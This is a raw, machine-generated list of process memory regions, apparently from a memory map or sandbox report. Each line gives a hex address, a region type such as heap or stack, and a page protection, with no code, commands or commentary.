A7F000
heap
page read and write
7D3E000
stack
page read and write
4E6D000
stack
page read and write
5121000
heap
page read and write
2723000
heap
page read and write
22CBCB43000
heap
page read and write
3100000
heap
page read and write
AF0000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAA5E000
heap
page read and write
22CBCB63000
heap
page read and write
E30000
heap
page read and write
4F10000
trusted library allocation
page read and write
24ABA7CD000
heap
page read and write
5E73000
heap
page read and write
5E95000
heap
page read and write
22CBCBBB000
heap
page read and write
22CBCB63000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAAE3000
heap
page read and write
7FF5D75EE000
unkown
page readonly
5121000
heap
page read and write
FF0000
unkown
page readonly
303A000
trusted library allocation
page execute and read and write
5AF8000
heap
page read and write
74F000
stack
page read and write
4F10000
trusted library allocation
page read and write
5121000
heap
page read and write
24ABAAFB000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAB43000
heap
page read and write
24ABAAF3000
heap
page read and write
24ABAB43000
heap
page read and write
24ABAADB000
heap
page read and write
2700000
heap
page read and write
1100000
unkown
page read and write
3A01000
heap
page read and write
5121000
heap
page read and write
22CBCB73000
heap
page read and write
5E59000
heap
page read and write
B950000
unkown
page readonly
1230000
trusted library allocation
page read and write
24ABAAB3000
heap
page read and write
22CBCB43000
heap
page read and write
4F10000
trusted library allocation
page read and write
ED0000
trusted library allocation
page read and write
24ABAAB3000
heap
page read and write
7FF5D7604000
unkown
page readonly
339C000
heap
page read and write
24ABAAD3000
heap
page read and write
5121000
heap
page read and write
546D000
heap
page read and write
33AC000
heap
page read and write
BF3E000
stack
page read and write
5120000
heap
page read and write
24ABAA64000
heap
page read and write
2B44000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
24ABAB2B000
heap
page read and write
A313000
unkown
page read and write
4904000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
32D3000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAAE3000
heap
page read and write
3020000
trusted library allocation
page read and write
3100000
unkown
page read and write
5681000
heap
page read and write
C8A000
heap
page read and write
8B70000
unkown
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
1100000
unkown
page read and write
4DE4000
heap
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
50A7000
heap
page read and write
24ABAB3B000
heap
page read and write
5298000
unkown
page read and write
24ABAA3B000
heap
page read and write
728A000
stack
page read and write
22CBCB93000
heap
page read and write
8CB8000
stack
page read and write
3074000
heap
page read and write
22CBCB5B000
heap
page read and write
A02E000
stack
page read and write
5121000
heap
page read and write
22CBC7BE000
heap
page read and write
33AC000
heap
page read and write
BA0000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
25C0000
trusted library allocation
page read and write
2B44000
heap
page read and write
7FF5D71EA000
unkown
page readonly
B85A000
stack
page read and write
7FF5D7280000
unkown
page readonly
6E03000
heap
page read and write
24ABA7FA000
heap
page read and write
2B44000
heap
page read and write
22CBCB43000
heap
page read and write
1190000
unkown
page read and write
22CBCB73000
heap
page read and write
24ABAACB000
heap
page read and write
7FF5D76D5000
unkown
page readonly
5121000
heap
page read and write
4B21000
heap
page read and write
24ABAA6C000
heap
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
24ABAB43000
heap
page read and write
4DE3000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCBAB000
heap
page read and write
8F10000
unkown
page read and write
3000000
unkown
page read and write
5121000
heap
page read and write
509C000
heap
page read and write
5121000
heap
page read and write
9B0B000
unkown
page read and write
5E6C000
heap
page read and write
24ABAB43000
heap
page read and write
5CC000
stack
page read and write
11C0000
unkown
page read and write
22CBCB63000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
22CBCBAB000
heap
page read and write
24ABAAE3000
heap
page read and write
5681000
heap
page read and write
24ABAACB000
heap
page read and write
1110000
unkown
page read and write
C7CB000
unkown
page read and write
22CBCB43000
heap
page read and write
ED0000
trusted library allocation
page read and write
24ABAACB000
heap
page read and write
24ABAB13000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
2B80000
heap
page read and write
86E0000
unkown
page readonly
B85000
heap
page read and write
11A0000
unkown
page read and write
22CBCBDB000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAB5B000
heap
page read and write
22CBCBBB000
heap
page read and write
22CBC6F4000
heap
page read and write
5121000
heap
page read and write
22CBCB73000
heap
page read and write
11C0000
unkown
page read and write
1190000
unkown
page read and write
24ABA897000
heap
page read and write
22CBCB63000
heap
page read and write
30D0000
trusted library allocation
page read and write
22CBCB43000
heap
page read and write
8B70000
unkown
page read and write
24ABAADB000
heap
page read and write
24ABAACB000
heap
page read and write
3410000
unkown
page read and write
1100000
unkown
page read and write
24ABAAFB000
heap
page read and write
5121000
heap
page read and write
22CBCBA3000
heap
page read and write
32B3000
heap
page read and write
50E2000
heap
page read and write
D25000
heap
page read and write
11D0000
unkown
page read and write
5AF8000
heap
page read and write
1170000
unkown
page read and write
5AF8000
heap
page read and write
5121000
heap
page read and write
8F10000
unkown
page read and write
24ABAAE3000
heap
page read and write
3107000
system
page execute and read and write
5C51000
trusted library allocation
page read and write
3120000
trusted library allocation
page execute and read and write
24ABAAB3000
heap
page read and write
3000000
unkown
page read and write
91C5000
trusted library allocation
page read and write
A82000
heap
page read and write
24ABAAE3000
heap
page read and write
5CB7000
trusted library allocation
page read and write
7FF5D77FD000
unkown
page readonly
7FF5D71C4000
unkown
page readonly
24ABAACB000
heap
page read and write
3400000
unkown
page read and write
3510000
trusted library allocation
page read and write
2B44000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAA67000
heap
page read and write
22CBCB5B000
heap
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
2B44000
heap
page read and write
20E76596000
heap
page read and write
22CBCB93000
heap
page read and write
22CBCB93000
heap
page read and write
22CBCBD3000
heap
page read and write
24D2000
heap
page read and write
8B70000
unkown
page read and write
2680000
heap
page read and write
7FF5D75CB000
unkown
page readonly
22CBCBAB000
heap
page read and write
24C1000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
5A75000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCB4B000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAB2B000
heap
page read and write
7FF5D775C000
unkown
page readonly
5C1F000
stack
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
ED0000
trusted library allocation
page read and write
22CBCB63000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB8B000
heap
page read and write
50E1000
heap
page read and write
5121000
heap
page read and write
85BE000
stack
page read and write
4AA0000
unkown
page read and write
24ABAB3B000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
8B70000
unkown
page read and write
3074000
heap
page read and write
24ABAADB000
heap
page read and write
5680000
unkown
page read and write
3408000
heap
page read and write
24ABAAE3000
heap
page read and write
32CE000
heap
page read and write
6DCF000
heap
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
24ABA871000
heap
page read and write
24ABA897000
heap
page read and write
57BE000
stack
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
7FF5D71E0000
unkown
page readonly
2B44000
heap
page read and write
4F80000
heap
page read and write
70D0000
trusted library allocation
page read and write
33AC000
heap
page read and write
22CBCB73000
heap
page read and write
AA04000
unkown
page read and write
24ABAB43000
heap
page read and write
35D5000
unkown
page read and write
22CBCB4B000
heap
page read and write
57A0000
unkown
page read and write
24ABAAE3000
heap
page read and write
8320000
trusted library allocation
page read and write
24ABAADA000
heap
page read and write
22CBCB4B000
heap
page read and write
347F000
heap
page read and write
22CBCBAB000
heap
page read and write
2AFC000
stack
page read and write
22CBCB7B000
heap
page read and write
7FF5D77F7000
unkown
page readonly
24ABAA69000
heap
page read and write
2B44000
heap
page read and write
A28D000
unkown
page read and write
6F8E000
stack
page read and write
1230000
trusted library allocation
page read and write
8F10000
unkown
page read and write
1170000
unkown
page read and write
7FF5D74B8000
unkown
page readonly
2C39000
stack
page read and write
1FF712DE000
heap
page read and write
7FF5D6BDB000
unkown
page readonly
24ABAADB000
heap
page read and write
33AC000
heap
page read and write
5121000
heap
page read and write
24ABA884000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
22CBCB63000
heap
page read and write
22CBCB7B000
heap
page read and write
23430FF000
stack
page read and write
24ABAACB000
heap
page read and write
22CBCBA3000
heap
page read and write
22CBCB5B000
heap
page read and write
49C2000
unkown
page read and write
EF17FEE000
stack
page read and write
33AC000
heap
page read and write
22CBCBAB000
heap
page read and write
5121000
heap
page read and write
6CBE000
stack
page read and write
24ABAAC3000
heap
page read and write
22CBCB4B000
heap
page read and write
35D3000
heap
page read and write
5681000
heap
page read and write
24ABAB13000
heap
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
8F10000
unkown
page read and write
22CBCB63000
heap
page read and write
24ABAAC3000
heap
page read and write
11C0000
unkown
page read and write
22CBCBF3000
heap
page read and write
9195000
trusted library allocation
page read and write
5681000
heap
page read and write
5D5E000
stack
page read and write
24ABAAC3000
heap
page read and write
84E0000
heap
page read and write
24ABAAC3000
heap
page read and write
2B44000
heap
page read and write
47E0000
heap
page execute and read and write
5AF8000
heap
page read and write
8F10000
unkown
page read and write
C62D000
unkown
page read and write
22CBA9E0000
unkown
page execute and read and write
C8E000
heap
page read and write
24ABAA72000
heap
page read and write
5098000
heap
page read and write
24ABAB2B000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAA69000
heap
page read and write
8B70000
unkown
page read and write
11A0000
unkown
page read and write
22CBCB5B000
heap
page read and write
24ABA7FE000
heap
page read and write
5121000
heap
page read and write
ED0000
trusted library allocation
page read and write
22CBCBA3000
heap
page read and write
22CBCB4B000
heap
page read and write
20E765BB000
heap
page read and write
59F6000
unkown
page read and write
24ABA7CF000
heap
page read and write
11C0000
unkown
page read and write
7FF5D72E9000
unkown
page readonly
1190000
unkown
page read and write
5479000
unkown
page read and write
5D9E000
stack
page read and write
24EE000
stack
page read and write
5121000
heap
page read and write
1100000
unkown
page read and write
5121000
heap
page read and write
24ABAB0B000
heap
page read and write
24ABAAE3000
heap
page read and write
2143000
heap
page read and write
8980000
unkown
page read and write
5E59000
heap
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
22CBCB93000
heap
page read and write
35C3000
heap
page read and write
D06000
heap
page read and write
1190000
unkown
page read and write
5680000
unkown
page read and write
8980000
unkown
page read and write
24ABA7DD000
heap
page read and write
22CBCB43000
heap
page read and write
8B70000
unkown
page read and write
24ABAAC3000
heap
page read and write
7040000
trusted library allocation
page read and write
5AF8000
heap
page read and write
5121000
heap
page read and write
22CBCB73000
heap
page read and write
22CBCB63000
heap
page read and write
4DEC000
heap
page read and write
22CBCB5B000
heap
page read and write
58FC000
stack
page read and write
5121000
heap
page read and write
20E766F0000
heap
page read and write
DD000
stack
page read and write
24ABA7A0000
heap
page read and write
427000
unkown
page execute and read and write
24ABAB23000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCBA3000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB4B000
heap
page read and write
24ABAB0B000
heap
page read and write
22CBCB4B000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB33000
heap
page read and write
11C0000
unkown
page read and write
475E000
stack
page read and write
22CBCB5B000
heap
page read and write
1FF71500000
heap
page read and write
22CBCB43000
heap
page read and write
2B44000
heap
page read and write
24ABAB13000
heap
page read and write
7DD0000
heap
page read and write
8B70000
unkown
page read and write
1110000
unkown
page read and write
11A0000
unkown
page read and write
27D0000
heap
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
24ABAB0B000
heap
page read and write
24ABAA69000
heap
page read and write
4C1E000
stack
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
D4D000
heap
page read and write
22CBCC0B000
heap
page read and write
8F10000
unkown
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
24ABA7FA000
heap
page read and write
7AB0000
unkown
page read and write
24ABAA71000
heap
page read and write
5121000
heap
page read and write
24ABAB0B000
heap
page read and write
347E000
stack
page read and write
22CBCB8B000
heap
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
22CBCB93000
heap
page read and write
8B70000
unkown
page read and write
11A0000
unkown
page read and write
5C5E000
stack
page read and write
1110000
unkown
page read and write
24ABAAC3000
heap
page read and write
24ABA884000
heap
page read and write
24ABAAFB000
heap
page read and write
24ABAA69000
heap
page read and write
8350000
trusted library allocation
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
22CBCB5B000
heap
page read and write
5820000
unkown
page read and write
2DF1000
heap
page read and write
A23A000
unkown
page read and write
401000
unkown
page execute and read and write
D4E000
heap
page read and write
24ABAA71000
heap
page read and write
A446CFF000
stack
page read and write
1170000
unkown
page read and write
31E0000
heap
page read and write
22CBCB4B000
heap
page read and write
5E7C000
heap
page read and write
25C0000
trusted library allocation
page read and write
1FF10001000
trusted library allocation
page read and write
AA0000
trusted library allocation
page read and write
2B44000
heap
page read and write
24ABAACB000
heap
page read and write
2F80000
unkown
page read and write
1230000
trusted library allocation
page read and write
920C000
trusted library allocation
page read and write
6DAD000
heap
page read and write
8F10000
unkown
page read and write
5C8000
unkown
page write copy
332E000
stack
page read and write
41D0000
heap
page read and write
1190000
unkown
page read and write
11D0000
unkown
page read and write
24ABAAE3000
heap
page read and write
32CC000
heap
page read and write
AA11000
unkown
page read and write
22CBCBD3000
heap
page read and write
490000
heap
page read and write
33AC000
heap
page read and write
5095000
heap
page read and write
8F10000
unkown
page read and write
4D7A000
heap
page read and write
5121000
heap
page read and write
A7C000
heap
page read and write
22CBCB63000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAA6C000
heap
page read and write
1190000
unkown
page read and write
24ABAA9B000
heap
page read and write
20E7658F000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB4B000
heap
page read and write
50B9000
heap
page read and write
4CE1000
heap
page read and write
2B44000
heap
page read and write
35D8000
heap
page read and write
1100000
unkown
page read and write
24ABA31C000
heap
page read and write
8980000
unkown
page read and write
53ED000
unkown
page read and write
22CBCBC3000
heap
page read and write
5507000
unkown
page read and write
24ABAAC3000
heap
page read and write
3CE0000
heap
page read and write
24ABAAE3000
heap
page read and write
5681000
heap
page read and write
4F10000
trusted library allocation
page read and write
2B44000
heap
page read and write
22CBCB43000
heap
page read and write
7FF5D7394000
unkown
page readonly
463E000
stack
page read and write
8B70000
unkown
page read and write
50E2000
heap
page read and write
24ABAADB000
heap
page read and write
24ABA310000
heap
page read and write
24ABAADB000
heap
page read and write
CD5000
heap
page read and write
4240000
heap
page read and write
22CBCB8B000
heap
page read and write
5A81000
unkown
page read and write
231F000
stack
page read and write
5121000
heap
page read and write
24ABA88E000
heap
page read and write
24ABAADB000
heap
page read and write
BA0000
trusted library allocation
page read and write
22CBCB63000
heap
page read and write
22CBCB5B000
heap
page read and write
24ABAA64000
heap
page read and write
24ABAA71000
heap
page read and write
22CBCB93000
heap
page read and write
22CBCB43000
heap
page read and write
5121000
heap
page read and write
A3B6000
unkown
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
59E2000
unkown
page read and write
24ABAAF3000
heap
page read and write
5121000
heap
page read and write
5605000
heap
page read and write
11A0000
unkown
page read and write
24ABAB6B000
heap
page read and write
5121000
heap
page read and write
49BB000
unkown
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
ED0000
trusted library allocation
page read and write
779E000
unkown
page read and write
2F1C000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAAAB000
heap
page read and write
760D000
unkown
page read and write
22CBCB5B000
heap
page read and write
24ABAA9C000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
7FF848EC0000
trusted library allocation
page read and write
24ABAA53000
heap
page read and write
11C0000
unkown
page read and write
8F10000
unkown
page read and write
24ABAA88000
heap
page read and write
33AC000
heap
page read and write
22CBCDC9000
heap
page read and write
58BC000
stack
page read and write
2B44000
heap
page read and write
91E0000
trusted library allocation
page read and write
24ABAB2B000
heap
page read and write
5E0000
unclassified section
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
8360000
unkown
page read and write
24ABA874000
heap
page read and write
5121000
heap
page read and write
2BCE000
stack
page read and write
24ABAAF3000
heap
page read and write
262E000
stack
page read and write
7FF5D7593000
unkown
page readonly
24ABAADB000
heap
page read and write
83B0000
trusted library allocation
page read and write
22CBCB7B000
heap
page read and write
44EC000
stack
page read and write
5681000
heap
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
24ABAA5B000
heap
page read and write
5121000
heap
page read and write
57FF000
stack
page read and write
5121000
heap
page read and write
5F0000
unkown
page readonly
8B70000
unkown
page read and write
C4C6000
unkown
page read and write
24ABAB83000
heap
page read and write
11C0000
unkown
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
22CBCB8B000
heap
page read and write
22CBCB4B000
heap
page read and write
7B20000
unkown
page read and write
11C0000
unkown
page read and write
4D70000
trusted library allocation
page read and write
24ABAB53000
heap
page read and write
5681000
heap
page read and write
8980000
unkown
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
11C0000
unkown
page read and write
24ABAACB000
heap
page read and write
22CBCB4B000
heap
page read and write
1109000
unkown
page read and write
24ABAACB000
heap
page read and write
98FD000
stack
page read and write
22CBCB63000
heap
page read and write
5121000
heap
page read and write
11D0000
unkown
page read and write
11C0000
unkown
page read and write
11C0000
unkown
page read and write
24ABAB23000
heap
page read and write
5E77000
heap
page read and write
22CBCB43000
heap
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
8360000
trusted library allocation
page read and write
22CBCB43000
heap
page read and write
5121000
heap
page read and write
91F5000
trusted library allocation
page read and write
760F000
unkown
page read and write
11D0000
unkown
page read and write
3134000
heap
page read and write
7FF5D766E000
unkown
page readonly
84BB000
stack
page read and write
E00000
unkown
page readonly
1FF71021000
unkown
page execute read
24ABAA66000
heap
page read and write
24ABA85A000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
4DE3000
heap
page read and write
22CBCB93000
heap
page read and write
2DC0000
heap
page read and write
32CC000
heap
page read and write
22CBCB5B000
heap
page read and write
7FF5D774C000
unkown
page readonly
24ABAA4B000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB8B000
heap
page read and write
30D0000
trusted library allocation
page read and write
7FF5D77EB000
unkown
page readonly
24ABAADA000
heap
page read and write
11C0000
unkown
page read and write
35D7000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
40A000
unkown
page write copy
8F10000
unkown
page read and write
24ABA884000
heap
page read and write
5121000
heap
page read and write
11D0000
unkown
page read and write
22CBCB63000
heap
page read and write
24ABAAAB000
heap
page read and write
24ABAB23000
heap
page read and write
A446EFD000
stack
page read and write
11A0000
unkown
page read and write
22CBCB5B000
heap
page read and write
7FF5D772C000
unkown
page readonly
22CBCB63000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
22CBCB5B000
heap
page read and write
3120000
heap
page read and write
3074000
heap
page read and write
7435000
stack
page read and write
24ABAAD3000
heap
page read and write
24ABAA64000
heap
page read and write
24ABAAC3000
heap
page read and write
2B44000
heap
page read and write
ED0000
trusted library allocation
page read and write
22CBCB63000
heap
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
674000
heap
page read and write
7DF4F2471000
unkown
page execute read
6D3E000
stack
page read and write
7060000
trusted library allocation
page read and write
24ABAACB000
heap
page read and write
22CBCB7B000
heap
page read and write
24ABAA3B000
heap
page read and write
24ABAAF3000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
D39000
heap
page read and write
24ABA210000
heap
page readonly
35BE000
heap
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
22CBCB63000
heap
page read and write
24ABA88F000
heap
page read and write
8B70000
unkown
page read and write
24ABA7FA000
heap
page read and write
5121000
heap
page read and write
D20000
heap
page read and write
5121000
heap
page read and write
4AB0000
unkown
page read and write
24ABA7A4000
heap
page read and write
22CBCB5B000
heap
page read and write
7FF5D7267000
unkown
page readonly
50A7000
heap
page read and write
24ABAAC3000
heap
page read and write
1FF71069000
unkown
page read and write
5681000
heap
page read and write
4F10000
trusted library allocation
page read and write
3110000
unkown
page readonly
5121000
heap
page read and write
2F80000
unkown
page read and write
3000000
unkown
page read and write
A4469FE000
stack
page read and write
5121000
heap
page read and write
D4B000
heap
page read and write
25C0000
trusted library allocation
page read and write
24ABA88E000
heap
page read and write
26BC000
heap
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABA888000
heap
page read and write
5121000
heap
page read and write
A50000
heap
page read and write
32BF000
heap
page read and write
22CBCB63000
heap
page read and write
2B44000
heap
page read and write
1170000
unkown
page read and write
C653000
unkown
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
24ABAAC3000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
A9E9000
unkown
page read and write
1FF7107F000
unkown
page execute and read and write
5121000
heap
page read and write
3979000
heap
page read and write
2F80000
unkown
page read and write
AAA9000
unkown
page read and write
11C0000
unkown
page read and write
24ABA897000
heap
page read and write
5A67000
unkown
page read and write
33AC000
heap
page read and write
24ABA88E000
heap
page read and write
2B44000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
57D0000
unkown
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
5E59000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
1100000
unkown
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
700E000
stack
page read and write
24ABAA78000
heap
page read and write
2D71000
system
page execute and read and write
5121000
heap
page read and write
5AF8000
heap
page read and write
24ABA884000
heap
page read and write
2B44000
heap
page read and write
5870000
unkown
page read and write
1383000
heap
page read and write
7C90000
unkown
page read and write
8B70000
unkown
page read and write
22CBCB4B000
heap
page read and write
24ABAB0B000
heap
page read and write
24ABAADB000
heap
page read and write
24ABA62C000
heap
page read and write
67CE000
stack
page read and write
11D0000
unkown
page read and write
5E59000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAB0B000
heap
page read and write
5AF8000
heap
page read and write
22CBCB63000
heap
page read and write
5681000
heap
page read and write
22CBCBDB000
heap
page read and write
8B70000
unkown
page read and write
1100000
unkown
page read and write
5051000
trusted library allocation
page read and write
4A90000
unkown
page read and write
2B44000
heap
page read and write
22CBCB5B000
heap
page read and write
35AC000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
2E40000
heap
page read and write
674000
heap
page read and write
22CBCB43000
heap
page read and write
5121000
heap
page read and write
7FF848FC2000
trusted library allocation
page read and write
2B44000
heap
page read and write
22CBCB4B000
heap
page read and write
D62000
heap
page read and write
22CBCB4B000
heap
page read and write
35DC000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAAE3000
heap
page read and write
423A000
heap
page read and write
C5FD000
unkown
page read and write
24ABA7FE000
heap
page read and write
5121000
heap
page read and write
35B5000
unkown
page read and write
22CBCB73000
heap
page read and write
2B44000
heap
page read and write
24ABAAE3000
heap
page read and write
1190000
unkown
page read and write
24ABAAE3000
heap
page read and write
1230000
trusted library allocation
page read and write
7FF5D7429000
unkown
page readonly
11C0000
unkown
page read and write
22CBCACB000
heap
page read and write
24ABAA69000
heap
page read and write
24ABAB2B000
heap
page read and write
5121000
heap
page read and write
C5F8000
unkown
page read and write
5121000
heap
page read and write
24ABAA91000
heap
page read and write
22CBCB5B000
heap
page read and write
22CBCB2B000
heap
page read and write
22CBCBBB000
heap
page read and write
22CBCB63000
heap
page read and write
5596000
heap
page read and write
7FF848EF6000
trusted library allocation
page execute and read and write
1F9000
stack
page read and write
1142000
unkown
page read and write
3000000
unkown
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
24ABAB0B000
heap
page read and write
8F10000
unkown
page read and write
7609000
unkown
page read and write
3FBA000
heap
page read and write
24ABAB13000
heap
page read and write
24ABAADB000
heap
page read and write
92A0000
trusted library allocation
page read and write
35DC000
unkown
page read and write
24ABAA64000
heap
page read and write
24ABAAE3000
heap
page read and write
5AF8000
heap
page read and write
11C0000
unkown
page read and write
C81C000
unkown
page read and write
535C000
stack
page read and write
12B0000
unkown
page read and write
22CBCB4B000
heap
page read and write
22CBD3C1000
heap
page read and write
1100000
unkown
page read and write
77F0000
trusted library allocation
page read and write
AE1D000
stack
page read and write
5681000
heap
page read and write
5AF8000
heap
page read and write
4CE1000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAACB000
heap
page read and write
5621000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
22CBC312000
heap
page read and write
5681000
heap
page read and write
24ABA894000
heap
page read and write
8B70000
unkown
page read and write
22CBCB43000
heap
page read and write
22CBCB33000
heap
page read and write
5121000
heap
page read and write
7FF5D77A4000
unkown
page readonly
5121000
heap
page read and write
8B70000
unkown
page read and write
4AD0000
trusted library allocation
page read and write
4F10000
trusted library allocation
page read and write
5121000
heap
page read and write
1FF711A0000
heap
page read and write
1170000
unkown
page read and write
24ABA887000
heap
page read and write
1190000
unkown
page read and write
5E75000
heap
page read and write
32D1000
heap
page read and write
3000000
unkown
page read and write
25C0000
trusted library allocation
page read and write
5819000
trusted library allocation
page read and write
24ABAACB000
heap
page read and write
2B44000
heap
page read and write
22CBCACB000
heap
page read and write
1281000
unkown
page readonly
8F10000
unkown
page read and write
11D0000
unkown
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAAF3000
heap
page read and write
1170000
unkown
page read and write
35B9000
heap
page read and write
3510000
trusted library allocation
page read and write
4CE1000
heap
page read and write
24ABAAFB000
heap
page read and write
24ABAAFB000
heap
page read and write
7FF5D7244000
unkown
page readonly
5681000
heap
page read and write
24ABA7CC000
heap
page read and write
8B70000
unkown
page read and write
3074000
heap
page read and write
686E000
stack
page read and write
22CBCB63000
heap
page read and write
8B70000
unkown
page read and write
10E7A000
heap
page read and write
5681000
heap
page read and write
1190000
unkown
page read and write
72CE000
stack
page read and write
5121000
heap
page read and write
22CBCB2B000
heap
page read and write
24ABAACB000
heap
page read and write
5681000
heap
page read and write
24ABAADB000
heap
page read and write
1FF71240000
trusted library allocation
page read and write
8B70000
unkown
page read and write
24ABAACB000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
63F000
heap
page read and write
91F7000
trusted library allocation
page read and write
8B70000
unkown
page read and write
CBE000
heap
page read and write
7C80000
unkown
page read and write
2B44000
heap
page read and write
24ABAAA7000
heap
page read and write
22CBCB8B000
heap
page read and write
5121000
heap
page read and write
22CBCB8B000
heap
page read and write
656000
unkown
page write copy
8260000
trusted library allocation
page read and write
59D6000
unkown
page read and write
22CBCB4B000
heap
page read and write
24ABAAC3000
heap
page read and write
51B0000
heap
page read and write
5121000
heap
page read and write
22CBCB4B000
heap
page read and write
24ABAA88000
heap
page read and write
24ABAACB000
heap
page read and write
8207000
stack
page read and write
5681000
heap
page read and write
22CBCB63000
heap
page read and write
33AC000
heap
page read and write
11D0000
unkown
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
114A000
unkown
page read and write
22CBCB4B000
heap
page read and write
327C000
stack
page read and write
AA0000
trusted library allocation
page read and write
24ABAA69000
heap
page read and write
10EC2000
unkown
page read and write
5121000
heap
page read and write
25C0000
trusted library allocation
page read and write
35C4000
heap
page read and write
24ABAAFB000
heap
page read and write
5121000
heap
page read and write
24ABAB3B000
heap
page read and write
91C1000
trusted library allocation
page read and write
24ABAACB000
heap
page read and write
24ABAB6B000
heap
page read and write
32DE000
heap
page read and write
161E000
heap
page read and write
5767000
heap
page read and write
50B2000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
7AF0000
trusted library allocation
page read and write
604000
heap
page read and write
33AC000
heap
page read and write
7FF5D770F000
unkown
page readonly
8980000
unkown
page read and write
5121000
heap
page read and write
7FF5D7292000
unkown
page readonly
2B44000
heap
page read and write
4CE1000
heap
page read and write
130000
heap
page read and write
7FF5D7523000
unkown
page readonly
C617000
unkown
page read and write
24ABAAE4000
heap
page read and write
20E765BA000
heap
page read and write
24ABAB0B000
heap
page read and write
94C9000
trusted library allocation
page read and write
22CBCB63000
heap
page read and write
5121000
heap
page read and write
91DA000
trusted library allocation
page read and write
917C000
trusted library allocation
page read and write
587F000
stack
page read and write
24ABAB23000
heap
page read and write
5E6D000
heap
page read and write
22CBCB63000
heap
page read and write
96FE000
stack
page read and write
2B44000
heap
page read and write
22CBCB93000
heap
page read and write
1FF71220000
trusted library allocation
page read and write
AA0000
trusted library allocation
page read and write
24ABAA66000
heap
page read and write
1230000
trusted library allocation
page read and write
1110000
unkown
page read and write
8890000
unkown
page readonly
3CF0000
unkown
page read and write
22CBCB43000
heap
page read and write
24ABAB13000
heap
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
2CED000
heap
page read and write
1143000
unkown
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
1190000
unkown
page read and write
32C3000
heap
page read and write
4DE9000
heap
page read and write
7FF5D77B9000
unkown
page readonly
3510000
trusted library allocation
page read and write
